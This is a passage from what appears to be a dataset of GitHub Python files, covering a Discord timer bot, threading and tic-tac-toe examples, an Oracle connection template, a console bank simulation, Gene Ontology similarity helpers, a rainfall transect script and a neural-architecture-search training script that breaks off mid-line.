\tif path.exists(file_path):\n
\t\twith open(file_path, 'rb') as fh:\n
\t\t\tresponse = HttpResponse(fh.read(), content_type='application/vnd.ms-excel')\n
\t\t\tresponse['Content-Disposition'] = 'inline; filename=' + path.basename(file_path)\n
\t\t\treturn response\n
\treturn render(request, 'converter/result.html', { 'file': file })\n
","repo_name":"ativadev/converter-ofx-xlsx","sub_path":"website/converter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29877056568","text":"import discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import AutoShardedBot\nfrom secrect import Secret\nimport os, datetime\nimport asyncio\n\nbot = discord.Client()\n\n
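# NOTE: commands and AutoShardedBot are imported above but never used;\n
# a plain discord.Client is enough for this bot.\n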
@bot.event\n
async def on_ready():\n
    print(\"Bot on\")\n
    print(bot.user.name)\n
    print(bot.user.id)\n
    game = discord.Game(\"peças fora\")\n
    loopcanal.start()\n
    await bot.change_presence(status=discord.Status.idle, activity=game)\n\n\n
@tasks.loop(minutes=1)\n
async def loopcanal():\n
    dia_horas = datetime.datetime.now()\n
    canal = bot.get_channel(id=826089258375708702)  # <-- id of the channel the messages are sent to\n
    await canal.send(f\"** `{dia_horas.day}`d | `{dia_horas.hour}`h :`{dia_horas.minute}`m **\")\n\n\n
if __name__ == \"__main__\":\n\n
    bot.run(Secret)\n
","repo_name":"Gabriel-bits/Bot-discord_Test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"5989754352","text":"import threading\nimport time\n\n\n
def test1():\n
    for i in range(5):\n
        print(\"-----test1---%d---\" % i)\n\n\n
def test2():\n
    for i in range(5):\n
        print(\"-----test2---%d---\" % i)\n\n\n
def main():\n
    t1 = threading.Thread(target=test1)\n
    t2 = threading.Thread(target=test2)\n\n
    t1.start()\n\n
    time.sleep(1)\n
    print(\"---1---\")\n\n
    t2.start()\n\n
    time.sleep(1)\n
    print(\"---2---\")\n\n
    print(threading.enumerate())\n\n\n
if __name__ == \"__main__\":\n
    main()\n\n
","repo_name":"Shadowalker1995/Advanced-Python-Tutorial","sub_path":"03-多任务-线程/03-让某些线程先执行.py","file_name":"03-让某些线程先执行.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"}
{"seq_id":"10962238264","text":"\"\"\"\n    Player class\n\n    Handles everything related to move selection by the bot or the human player.\n\"\"\"\n\n
from bot.minimax import minimax_soft_alpha_beta, get_depth\n
import random\n
from math import inf\n\n\n
class Player:\n
    \"\"\"\n
    Player class\n\n
    A player can be a human or bot.\n
    \"\"\"\n
    def __init__(self, bot, state, mark):\n
        \"\"\"\n
        Constructor for the Player class.\n\n
        :param bot: type: bool\n
            True if the player is a bot, else False for human player\n\n
        :param state: type: int\n
            Integer representing the player's state (0 or 1 or 2)\n
            0 - BLANK_STATE\n
            1 - HUMAN_STATE\n
            2 - BOT_STATE\n\n
        :param mark: type: str\n
            String representing the player's mark. (Noughts or crosses) (X or O)\n
        \"\"\"\n
        self._bot = bot\n
        self._state = state\n
        self._mark = mark\n\n
    @property\n
    def bot(self):\n
        return self._bot\n\n
    @property\n
    def state(self):\n
        return self._state\n\n
    @property\n
    def mark(self):\n
        return self._mark\n\n
    @staticmethod\n
    def convert_index_to_move(index):\n
        \"\"\"\n
        Converts user input index (1-9) into move indexes. (<row_index>, <column_index>)\n\n
        :param index: type: int\n
            User input selected move index (1-9)\n\n
        :return: type: tuple\n
            Selected move index in numpy array format (<row_index>, <column_index>)\n
        \"\"\"\n
        index_to_move_dict = {\n
            1: (0, 0),\n
            2: (0, 1),\n
            3: (0, 2),\n
            4: (1, 0),\n
            5: (1, 1),\n
            6: (1, 2),\n
            7: (2, 0),\n
            8: (2, 1),\n
            9: (2, 2)\n
        }\n\n
        return index_to_move_dict[index]\n\n
    def make_move(self, board):\n
        \"\"\"\n
        Calls the minimax algorithm if the player is a bot, else requests user input for the human player.\n\n
        :param board: type: numpy.ndarray\n
            The current state of the Tic Tac Toe board game\n
            Input for the minimax algorithm to find the optimal move\n\n
        :return: type: tuple\n
            Selected move index in numpy array format (<row_index>, <column_index>)\n
        \"\"\"\n
        if self._bot:\n
            # Minimax algorithm\n
            _, moves = minimax_soft_alpha_beta(board, get_depth(board), True, -inf, +inf)\n
            move = random.choice(moves)\n
        else:\n
            # Prompt the user to select a move\n
            index = input(\"Enter move: \")\n
            move = Player.convert_index_to_move(int(index))\n\n
        return move\n
","repo_name":"ao9000/tic-tac-toe-ai","sub_path":"game/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"72008460005","text":"import cx_Oracle\n\n
con = None\n
cursor = None\n
try:\n
    con = cx_Oracle.connect('system/theja2020@localhost:8095/ORCLCDB')\n
    cursor = con.cursor()\n
    print('Connected')\n\n
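# con and cursor start out as None above, so the error and cleanup branches\n
# below cannot raise NameError when connect() itself fails.\n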
except cx_Oracle.DatabaseError as e:\n
    if con:\n
        con.rollback()\n
    print('PROBLEM', e)\n
finally:\n
    if cursor:\n
        cursor.close()\n
    if con:\n
        con.close()\n\n
# Connected\n
","repo_name":"ksrntheja/08-Python-Core","sub_path":"venv/pdbc/Oracle00Template.py","file_name":"Oracle00Template.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"11553002531","text":"# Today we'll build our own personal bank\n\n
class bank:\n
    print(\"WELCOME TO PYTHON BANK\")\n\n
    print(\"Enter YOUR NAME TO START A TRANSACTION\")\n
# THIS BLOCK OF CODE CHECKS IF THE USER EXISTS; IF NOT, IT ASKS THE USER TO REGISTER\n
# THIS WILL ACCEPT A SINGLE STR_VALUE FROM THE USER\n
    def enter_name(self, name):\n
        user = ['vishal', 'nilesh', 'kanishka', 'ananya']\n
        self.user_name = name\n
        self.balance = 1000\n
        if self.user_name in user:\n
            print(\"Hello\", self.user_name, \"What Kind Of Transaction Would You Like To Do\")\n
        else:\n
            print(\"User Not Found Error 404\")\n
            print(\"Press 1 To Register Yourself OR\", \"Any Other Number To Exit\")\n
            ent = int(input())\n
            if ent == 1:\n
                print(\"Hi My Name Is Mohit Chouchan \\n\", \"PLEASE Enter Your Name To Create an Account\")\n
                new_user = input()\n
                user.append(new_user)\n
                print(new_user, \"Your Account Was Created Successfully. Happy Banking\")\n
            else:\n
                exit()\n
# THIS BLOCK OF CODE DISPLAYS THE OPTIONS THE USER CAN PERFORM\n
    def menu(self):\n
        print(\"1 For Deposit/Withdraw\")\n
        print(\"2 For Check Balance\")\n
        print(\"3 For Add Beneficiary\")\n
        print(\"4 For Transfer\")\n\n\n
# IF THE USER SELECTS OPTION 1 THEN THIS BLOCK OF CODE RUNS; IT ACCEPTS TWO VALUES FROM THE USER:\n
# 1 STR_VALUE AND 2 INT_VALUE, SPACE SEPARATED; THE USER CAN DEPOSIT TO OR WITHDRAW FROM THEIR ACCOUNT\n
    def given_option1(self, trans_type, amount):\n
        self.user_trans = trans_type\n
        if self.user_trans == 'credit':  # THE USER HAS TO ENTER credit TO DEPOSIT\n
            self.balance = self.balance + int(amount)\n
        elif self.user_trans == 'debit':  # THE USER HAS TO ENTER debit TO WITHDRAW\n
            self.balance = self.balance - int(amount)\n
        else:  # IF ANY OTHER VALUE IS GIVEN THE USER GETS THE MESSAGE BELOW\n
            print(\"Enter Correct Transaction Type\")\n\n
# THE USER CAN ADD A BENEFICIARY TO THEIR ACCOUNT TO MAKE MONEY TRANSFERS; THIS WILL ACCEPT 1 STR_VALUE\n
    def add_benificary(self, name):\n
        list_of_benificary = ['atul', 'shubham']\n
        self.benificary_name = name\n
        if self.benificary_name not in list_of_benificary:  # IF THE BENEFICIARY IS NOT IN THE LIST IT WILL BE ADDED\n
            list_of_benificary.append(self.benificary_name)  # AND A SUCCESS MESSAGE IS DISPLAYED\n
            print(\"Beneficiary\", self.benificary_name, \"Added Successfully\\n\" \"Beneficiaries In Your Ac are\", list_of_benificary)\n
        else:  # IF THE BENEFICIARY ALREADY EXISTS THE MESSAGE BELOW IS DISPLAYED\n
            print(\"Beneficiary\", self.benificary_name, \"Already Exists\\n\" \"Beneficiaries In Your Ac are\", list_of_benificary)\n
        return list_of_benificary\n\n\n
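# driver: a simple interactive menu loop; it keeps serving transactions until\n
# the user answers anything other than 'Y' to the \"another transaction\" prompt\n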
openbank = bank()\n
openbank.enter_name(input())\n
openbank.menu()\n
while True:  # THE LOOP RUNS UNTIL THE USER WANTS TO STOP, SO THE USER CAN DO CONTINUOUS TRANSACTIONS\n
    choice = int(input())  # ASK THE USER TO ENTER THE TRANSACTION NUMBER 1, 2, 3 OR 4\n
    if choice == 1:  # IF 1, THE USER IS ALLOWED TO CREDIT AND DEBIT THEIR ACCOUNT\n
        print(\"For Deposit Enter credit and amount --- For Withdraw Enter debit and amount\")\n
        len_den, paisa = input().split()\n
        openbank.given_option1(len_den, paisa)  # THE METHOD DEFINED IN CLASS bank IS CALLED TO MAKE THE CREDIT/DEBIT\n
        print(\"Your Account Balance After The Current Transaction is\", openbank.balance)  # DISPLAY THE BALANCE OF THE AC\n
        print(\"Would You Like To Do Another Transaction Y/N\")\n
        more = input()  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
        if more == 'Y':\n
            openbank.menu()\n
            continue\n
        else:\n
            exit()\n\n
    elif choice == 2:  # IF 2, THE USER CAN CHECK THEIR ACCOUNT BALANCE\n
        print(\"Your Account Balance is\", openbank.balance)\n
        print(\"Would You Like To Do Another Transaction Y/N\")\n
        more = input()  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
        if more == 'Y':\n
            openbank.menu()\n
            continue\n
        else:\n
            exit()\n\n
    elif choice == 3:  # IF 3, THE USER CAN ADD A BENEFICIARY TO THEIR ACCOUNT TO MAKE TRANSACTIONS\n
        print(\"Enter The Name Of The Beneficiary You Want To Add\")\n
        openbank.add_benificary(input())  # THE add_benificary METHOD OF CLASS bank IS CALLED\n
        print(\"Would You Like To Do Another Transaction Y/N\")\n
        more = input()  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
        if more == 'Y':\n
            openbank.menu()\n
            continue\n
        else:\n
            exit()\n\n
    elif choice == 4:  # IF 4, THE USER CAN TRANSFER AN AMOUNT TO A BENEFICIARY IN THE LIST\n
        print(\"Enter The Beneficiary Name and Amount To Transfer \")\n
        ben_name, trans_amount = input().split()  # THIS ACCEPTS 2 VALUES FROM THE USER, STR AND INT, SPACE SEPARATED\n
        return_value = openbank.add_benificary(ben_name).copy()  # GET A COPY OF THE BENEFICIARY LIST\n
        # AND CHECK WHETHER THE BENEFICIARY IS AVAILABLE OR NOT;\n
        # IF NOT, THE BENEFICIARY IS ADDED TO THE LIST\n
# THE CODE BELOW CHECKS WHETHER SUFFICIENT BALANCE IS AVAILABLE\n
# IN THE USER'S ACCOUNT AND GIVES THE CORRESPONDING MESSAGE\n
        if openbank.balance < int(trans_amount):  # INSUFFICIENT BALANCE\n
            print(\"No Sufficient Balance Please Deposit Some Money\", \"\\n Click On Y TO Proceed\")\n
            more = input()  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
            if more == 'Y':\n
                openbank.menu()\n
                continue\n
            else:\n
                exit()\n
        if openbank.balance > int(trans_amount):  # ENOUGH BALANCE, DO A SUCCESSFUL TRANSACTION\n
            openbank.balance = openbank.balance - int(trans_amount)\n
            print(int(trans_amount), \"Got Transferred Successfully To\", ben_name, \"\\n Your Current Balance is\", openbank.balance)\n
            print(\"Would You Like To Do Another Transaction Y/N\")\n
            more = input()\n
            if more == 'Y':  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
                openbank.menu()\n
                continue\n
            else:\n
                exit()\n
        if openbank.balance == int(trans_amount):  # WARNS THAT AFTER THIS TRANSACTION THE USER'S AC_BAL WILL BE ZERO,\n
            # SO IT ASKS FOR CONFIRMATION WHETHER THE USER STILL WANTS TO PROCEED;\n
            # IF THE CUSTOMER DECLINES, THE TRANSFER IS CANCELLED\n
            print(\"WARNING After This Transaction Your Account Balance Will Be Zero Press Y to Continue\")\n
            confirmation = input()\n
            if confirmation == 'Y':\n
                openbank.balance = openbank.balance - int(trans_amount)\n
                print(int(trans_amount), \"Got Transferred Successfully To\", ben_name, \"\\n Your Current Balance is\",\n
                      openbank.balance)\n
                print(\"Would You Like To Do Another Transaction Y/N\")\n
                more = input()\n
                if more == 'Y':  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
                    openbank.menu()\n
                    continue\n
                else:\n
                    exit()\n
            else:\n
                print(\"Transfer Cancelled\")\n
                print(\"Would You Like To Do Another Transaction Y/N\")\n
                more = input()\n
                if more == 'Y':  # TO DO MORE TRANSACTIONS THE USER HAS TO ENTER Y, OR N TO STOP\n
                    openbank.menu()\n
                    continue\n
                else:\n
                    exit()","repo_name":"vishalg1021997/trial","sub_path":"nawabank.py","file_name":"nawabank.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"24897855900","text":"'''\nAmazon interview question -\n\n# Given a log file containing two days of web server logs,\n# find the percentage of users who visited the site on\n# both days. 
The log file contains the following\n# columns, separated by spaces.\n\n# Date, Operation, Path, User, Status Code\n# 2019-02-02T18:83:03 GET /some/webpage.html ted 200\n# 2019-02-02T18:83:03 GET /some/otherpage.html ted 200\n# 2019-02-02T18:83:03 GET /some/otherwebpage.html sue 200\n# 2019-02-02T18:83:03 GET /some/third.html josh 404\n# 2019-02-03T18:83:03 GET /some/webpage.html ted 200\n\n>>> percentage_users(log_file) = 33.33\n'''\n\nimport csv\n\n\ndef percentage_users(log_file):\n ''':input type file\n :rtype float\n '''\n \n d = {}\n with open(log_file, 'r') as f:\n csvData = csv.reader(f, delimiter = ' ')\n next(csvData) # ignore the first line in the file\n for line in csvData:\n date = line[0].split('T')[0]\n user = line[3]\n print(date, user)\n try:\n d[date].add(user)\n except KeyError:\n d[date] = {user}\n \n print(d) # for debugging\n day1, day2 = d.values()\n both_days = len(day1.intersection(day2))\n total_users = len(day1.union(day2))\n return both_days/total_users * 100\n\n\n\n\nif __name__ == \"__main__\":\n log_file = 'log.txt'\n print('percentage of users visited both days = {} %'.format(percentage_users(log_file)))\n\n","repo_name":"mgokani/pythonPractise","sub_path":"amazonProblem.py","file_name":"amazonProblem.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29718096400","text":"#!/usr/bin/env python3\n\nimport pickle\nimport logging\nimport lzma\n\ngo_roots = {\n \"biological_process\": \"GO:0008150\",\n \"cellular_component\": \"GO:0005575\",\n \"molecular_function\": \"GO:0003674\"\n}\n\n\nclass GoTerm(object):\n \"\"\"\n A doubly linked list of GO records containing some extra metadata of the\n given GO term.\n \"\"\"\n\n def __init__(self, go_id, go_name=None, go_def=None):\n \"\"\"\n Creates a GO term object.\n\n :type go_id: str\n :param go_id: The unique identifier given to the GO term. 
This term has\n to be unique and will be used as the hash of this instance.\n\n :type go_name: str\n :param go_name: The name of the GO term.\n\n :type go_def: str\n :param go_def: The definition of the GO term.\n \"\"\"\n if go_id is None:\n raise ValueError(\"go_id cannot be None.\")\n\n self.go_id = go_id\n self.go_name = go_name\n self.go_def = go_def\n self.children = list()\n self.parents = list()\n self.total_offspring = 0\n self.information_content = 0.\n\n def __hash__(self):\n # we assume that go_id is unique for all instances (should be the case anyway)\n return hash(self.go_id)\n\n def __repr__(self):\n return 'GoTerm(go_id=\"{}\", go_name=\"{}\", go_def=\"{}\", children={}, parents={}, total_offspring={}, ' \\\n 'information_content={})' \\\n .format(\n self.go_id, self.go_name, self.go_def, len(self.children), len(self.parents), self.total_offspring,\n self.information_content\n )\n\n def __str__(self):\n return '{} [{}]'.format(\n self.go_id, self.go_name\n )\n\n def __eq__(self, other):\n if not isinstance(other, self.__class__):\n return False\n return self.go_id == other.go_id\n\n def set_name(self, go_name):\n \"\"\"\n Set the name of the GO term.\n\n :type go_name: str\n :param go_name: The new name of the GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n self.go_name = go_name\n return self\n\n def set_definition(self, go_def):\n \"\"\"\n Set the definition of the GO term.\n\n :type go_def: str\n :param go_def: The new definition of the GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n self.go_def = go_def\n return self\n\n def add_parent(self, parent_term):\n \"\"\"\n Add a new parent GO term to this GO term.\n\n :type parent_term: str\n :param parent_term: The ID of the parent GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n if parent_term not in self.parents:\n self.parents.append(parent_term)\n return self\n\n def add_child(self, child_term):\n \"\"\"\n Add a new child GO term to this GO term.\n\n :type child_term: str\n :param child_term: The ID of the child GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n if child_term not in self.children:\n self.children.append(child_term)\n return self\n\n\ndef export_go_tree(go_tree, export_location):\n \"\"\"\n Serialises and compresses the GO tree object into a single file.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO dictionary to export.\n\n :type export_location: str\n :param export_location: The location to write the file to.\n \"\"\"\n logging.info(\"Compressing and exporting GO dictionary to %s ...\", export_location)\n with lzma.open(export_location, \"wb\") as f:\n pickle.dump(go_tree, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef import_go_tree(import_location):\n \"\"\"\n Decompresses and deserialises the given file containing the processed GO\n tree created by create_go_tree.py\n\n :type import_location: str\n :param import_location: File location of the LZMA compressed and pickled\n object.\n\n :rtype: dict[str, GoTerm]\n :return: The deserialised object from the file.\n \"\"\"\n logging.info(\"Decompressing and importing GO dictionary from %s ...\", import_location)\n with lzma.open(import_location, \"rb\") as f:\n return pickle.load(f)\n\n\ndef go_lin_similarity(go_tree, term1, term2):\n \"\"\"\n Calculate Lin's similarity score between two GO terms.\n http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.55.1832&rep=rep1&type=pdf\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree 
dictionary.\n\n :type term1: str\n :param term1: The first GO term.\n\n :type term2: str\n :param term2: The second GO term.\n\n :rtype: float\n :return: Lin's term similarity score.\n \"\"\"\n intersecting_ancestors = lowest_common_ancestor(go_tree, term1, term2)\n if not intersecting_ancestors:\n return 0.\n lca = intersecting_ancestors.pop()\n # get the LCS with the highest IC\n for term in intersecting_ancestors:\n if go_tree[lca].information_content < go_tree[term].information_content:\n lca = term\n\n # calculate Lin's similarity score\n return 2 * go_tree[lca].information_content / \\\n (go_tree[term1].information_content + go_tree[term2].information_content)\n\n\ndef lowest_common_ancestor(go_tree, term1, term2):\n \"\"\"\n Find the lowest common ancestor (LCA) of all paths in the GO DAG.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type term1: str\n :param term1: The first GO term.\n\n :type term2: str\n :param term2: The second GO term.\n\n :rtype: set[str]\n :return: Set of LCA's found on each possible path.\n \"\"\"\n go_term1 = go_tree[term1]\n go_term2 = go_tree[term2]\n\n if go_term1 == go_term2:\n return {term1}\n\n lca = set()\n # iterate over parents of the most specific node (lower in tree)\n if go_term1.information_content > go_term2.information_content:\n for parent in go_term1.parents:\n subsumer = lowest_common_ancestor(go_tree, parent, go_term2.go_id)\n if not subsumer:\n continue\n lca.update(subsumer)\n else:\n for parent in go_term2.parents:\n subsumer = lowest_common_ancestor(go_tree, go_term1.go_id, parent)\n if not subsumer:\n continue\n lca.update(subsumer)\n\n return lca\n\n\ndef get_all_ancestors(go_tree, go_term, ancestors):\n \"\"\"\n Add all ancestor terms of a given GO term to a list.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type go_term: str\n :param go_term: GO term to find all ancestor terms of.\n\n :type ancestors: set[str]\n :param ancestors: Set where all ancestor terms will be added to. 
The\n    given GO term will also be added to this set.\n    \"\"\"\n    ancestors.add(go_term)\n    for parent in go_tree[go_term].parents:\n        get_all_ancestors(go_tree, parent, ancestors)\n\n\ndef get_value_frequency(values_list):\n    \"\"\"\n    Count the frequency of objects in a list.\n\n    :type values_list: list\n    :param values_list: List containing the values to count the frequencies of.\n\n    :rtype: dict[_KT, int]\n    :return: A dictionary containing the values and their counts.\n    \"\"\"\n    occurrences = dict()\n    for term in values_list:\n        occurrences[term] = occurrences.get(term, 0) + 1\n    return occurrences\n\n\ndef go_lineage_frequencies(go_tree, go_terms):\n    \"\"\"\n    Calculate how often ancestor terms occur in the given list of GO terms.\n\n    :type go_tree: dict[str, GoTerm]\n    :param go_tree: The GO tree dictionary.\n\n    :type go_terms: list[str]\n    :param go_terms: List of GO terms to calculate the ancestor frequencies of.\n\n    :rtype: dict[str, int]\n    :return: Dictionary containing the frequency of found ancestor GO terms.\n    \"\"\"\n    lineage_frequency = dict()\n    for term in go_terms:\n        if term not in go_tree:\n            # GO term has been deprecated\n            continue\n\n        term_lineage = set()\n        get_all_ancestors(go_tree, term, term_lineage)\n\n        for ancestor in term_lineage:\n            lineage_frequency[ancestor] = lineage_frequency.get(ancestor, 0) + 1\n    return lineage_frequency\n","repo_name":"ebete/micro-qtl","sub_path":"go_helpers.py","file_name":"go_helpers.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"43708057409","text":"# Core \nimport datetime\nimport os\nimport glob\nimport sys\n\n# Analysis \nimport xarray as xr\nimport numpy as np\nimport pyproj as pp\nimport scipy as sp\nimport imp\nimp.load_source('transect_analysis', '/home/563/esh563/goulburn_NT/transect_analysis.py')\nimport transect_analysis as ta\n\n# Specify start and end coords on coast.\n# Choose order so that (transect_axis, coastline_axis) forms a right hand coordinate system\nlon0 = 134.5293 \nlat0 = -12.4715\ncoast_lon1 = 133.3290\ncoast_lat1 = -12.1468\n\ntrans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans, coast_distances, tran_distances = ta.define_transects(\n    lon0, lat0, coast_lon1, coast_lat1, 453300, spacing = 8*10**3\n)\n\nstatic_path = '/g/data/ua8/ARCCSS_Data/MCASClimate/v1-0/static/static.nc'\nstatic = xr.open_dataset(static_path).sel(latitude=slice(-12.75,-6), longitude=slice(130,139))\nstatic_tran = ta.calc_transects(static, trans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans) \nstatic_tran = static_tran.assign_coords(coastal_axis = coast_distances)\nstatic_tran = static_tran.assign_coords(transect_axis = tran_distances)\n\n# Calculate distance where landmask drops below 0.5\ncoast_i = np.where(static_tran.mean('coastal_axis').LANDMASK.values < 0.5)[0][0] - 1\ncoast_location = tran_distances[coast_i]\n\n# Redefine tran_distances so that coastline occurs at 0.\ntran_distances = tran_distances - coast_location\n\n# Create basis vectors of new coordinate system\nb_lon = trans_lon1[0] - lon0\nb_lat = trans_lat1[0] - lat0\n\n# Iterate over all years\nfor i in range(5, 15):\n\n    print('Solving for 20{}'.format(str(i).zfill(2)), end='\\r')\n\n    # Calculate transects for first day of data\n    CMORPH_path = '/g/data/ua8/CMORPH/CMORPH_V1.0/netcdf/20{}/pr_30min_CMORPH_V1_20{}1101_20{}1130.nc'.format(\n        str(i).zfill(2), str(i).zfill(2), str(i).zfill(2)\n    ) \n    CMORPH = xr.open_dataset(CMORPH_path).sel(lat = slice(-12.6, 
-8), lon = slice(132.8, 136.2)).rename({'lat' : 'latitude', 'lon' : 'longitude'}) \n\n CMORPH_tran = ta.calc_transects(CMORPH.pr, trans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans)\n \n CMORPH_tran = CMORPH_tran\\\n .assign_coords(coastal_axis = coast_distances)\\\n .assign_coords(transect_axis = tran_distances)\\\n .rename('pr')\n \n save_path_CMORPH = '/g/data/w40/esh563/goulburn_NT/transects/CMORPH_goulburn_20{}11.nc'.format(str(i).zfill(2))\n CMORPH_tran.to_netcdf(path=save_path_CMORPH, mode='w', format='NETCDF4')\n\n","repo_name":"eshort0401/goulburn_NT","sub_path":"CMORPH_scripts/CMORPH_transect.py","file_name":"CMORPH_transect.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"18556993276","text":"import os\nimport sys\nimport logging\nimport random\nimport torch.nn as nn\nimport genotypes\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport torch.utils\nimport torchvision.datasets as dset\nimport torch.backends.cudnn as cudnn\nimport torch.utils\nimport torch.nn.functional as F\nimport time\nimport utils\n\nfrom cell_operationsNAS201 import NAS_BENCH_201\nfrom config_utils import load_config\nfrom datasets import get_datasets, get_nas_search_loaders\nfrom gaNAS201 import GeneticAlgorithm\nfrom nas_201_api import NASBench201API as API\nfrom populationNAS201 import *\nfrom optimizers import get_optim_scheduler\nfrom search_model_NAS201 import TinyNetwork\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.autograd import Variable\n\nparser = argparse.ArgumentParser(\"NAS201\")\nparser.add_argument('--data', type = str, default = '../data', help = 'location of the data corpus')\nparser.add_argument('--dir', type = str, default = None, help = 'location of trials')\nparser.add_argument('--cutout', action = 'store_true', default = False, help = 'use cutout')\nparser.add_argument('--cutout_length', type = int, default = 16, help = 'cutout length')\nparser.add_argument('--batch_size', type = int, default = 64, help = 'batch size')\nparser.add_argument('--valid_batch_size', type = int, default = 1024, help = 'validation batch size')\nparser.add_argument('--epochs', type = int, default = 50, help = 'num of training epochs')\nparser.add_argument('--seed', type = int, default = 18, help = 'random seed')\nparser.add_argument('--gpu', type = int, default = 0, help = 'gpu device id')\nparser.add_argument('--tsize', type = int, default = 10, help = 'Tournament size')\nparser.add_argument('--num_elites', type = int, default = 1, help = 'Number of Elites')\nparser.add_argument('--mutate_rate', type = float, default = 0.1, help = 'mutation rate')\nparser.add_argument('--learning_rate', type = float, default = 0.025, help = 'init learning rate')\nparser.add_argument('--learning_rate_min', type = float, default = 0.001, help = 'min learning rate')\nparser.add_argument('--momentum', type = float, default = 0.9, help = 'momentum')\nparser.add_argument('--weight_decay', type = float, default = 3e-4, help = 'weight decay')\nparser.add_argument('--grad_clip', type = float, default = 5, help = 'gradient clipping')\nparser.add_argument('--pop_size', type = int, default = 50, help = 'population size')\nparser.add_argument('--report_freq', type = float, default = 50, help = 'report frequency')\nparser.add_argument('--init_channels', type = int, default = 16, help = 'num of init channels')\n\n# Added for NAS201\n#parser.add_argument('--channel', type = 
int, default = 16, help = 'initial channel for NAS201 network')\nparser.add_argument('--num_cells', type = int, default = 5, help = 'number of cells for NAS201 network')\nparser.add_argument('--max_nodes', type = int, default = 4, help = 'maximum nodes in the cell for NAS201 network')\nparser.add_argument('--track_running_stats', action = 'store_true', default = False, help = 'use track_running_stats in BN layer')\nparser.add_argument('--dataset', type = str, default = 'cifar10', help = '[\"cifar10\", \"cifar100\", \"ImageNet16-120\"]')\nparser.add_argument('--api_path', type = str, default = None, help = '[\"cifar10\", \"cifar10-valid\",\"cifar100\", \"imagenet16-120\"]')\nparser.add_argument('--trainval', action='store_true')\nparser.add_argument('--workers', type=int, default=2, help='number of data loading workers (default: 2)')\nparser.add_argument('--config_path', type=str, help='The config path.')\nargs = parser.parse_args()\n\ndef get_arch_score(api, arch_index, dataset, hp, acc_type):\n    info = api.query_by_index(arch_index, hp = str(hp))\n    return info.get_metrics(dataset, acc_type)['accuracy']\n\ndef train(model, train_queue, criterion, optimizer, gen):\n    model.train()\n    for step, (inputs, targets) in enumerate(train_queue):\n        #model.copy_arch_parameters(population.get_population()[step % args.pop_size].arch_parameters)\n        #assert utils.check_equality(model, population.get_population()[step % args.pop_size].arch_parameters)\n        #discrete_alphas = utils.discretize(population.get_population()[step % args.pop_size].arch_parameters, device)\n        \n        #Copying and checking the discretized alphas\n        model.update_alphas(population.get_population()[step % args.pop_size].arch_parameters[0])\n        discrete_alphas = model.discretize()\n        _, df_max, _ = model.show_alphas_dataframe()\n        assert np.all(np.equal(df_max.to_numpy(), discrete_alphas.cpu().numpy()))\n        assert model.check_alphas(discrete_alphas)\n        \n        n = inputs.size(0)\n        inputs = inputs.to(device)\n        targets = targets.to(device)\n        \n        #inputs = inputs.cuda(non_blocking=True)\n        #targets = targets.cuda(non_blocking=True)\n        optimizer.zero_grad()\n        _, logits = model(inputs)\n        loss = criterion(logits, targets)\n        loss.backward()\n        nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n        optimizer.step()\n\n        prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n        population.get_population()[step % args.pop_size].objs.update(loss.data.cpu().item(), n)\n        population.get_population()[step % args.pop_size].top1.update(prec1.data.cpu().item(), n)\n        population.get_population()[step % args.pop_size].top5.update(prec5.data.cpu().item(), n)\n        \n        #population.get_population()[step % args.pop_size].accumulate()\n        \n        #print(step)\n        if (step + 1) % 100 == 0:\n            # break\n            logging.info(\"[{} Generation]\".format(gen))\n            logging.info(\"Using Training batch #{} for {}/{} architecture with loss: {}, prec1: {}, prec5: {}\".format(step, step % args.pop_size, \n                len(population.get_population()), \n                population.get_population()[step % args.pop_size].objs.avg, \n                population.get_population()[step % 